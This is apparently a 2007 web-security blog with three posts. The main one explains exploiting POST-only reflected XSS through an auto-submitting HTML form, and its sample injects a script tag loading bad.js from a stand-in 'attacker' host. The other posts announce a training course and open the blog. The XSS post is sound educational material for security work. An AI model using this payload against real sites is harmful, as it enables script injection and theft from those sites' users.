Thursday, March 29, 2007

Exploiting XSS in POST requests

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>
<input type=hidden name=foo value=&quot;&gt;&lt;script&#32;src=http://attacker/ bad.js&gt;&lt;/script&gt;>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.

Monday, March 19, 2007

Black Hat Europe

I'm going to be co-presenting a training course in Amsterdam next week. Though I say it myself, the course should be pretty fun. As well as all the usual web app stuff, we're going to cover some more entertaining hacks like reversing Java applets and Flash. If you want to know how to cheat at online poker whilst you're supposed to be doing a pen test, this course is perfect for you. Anyone who happens to be there, please do come and say hello.

Saturday, March 10, 2007

Hello world

I realise that this may be somewhat late in the day to be starting a blog about web application security, especially given that you would expect all of that stuff to have been sorted out by now. But two pertinent facts are that (a) I am prone to prolonged periods of inactivity; and (b) I will shortly have a new book to pimppromote. There is certainly still much to say that is interesting and even fun, so please expect future posts to be rather more noteworthy than this one. In the meantime, hello web app world.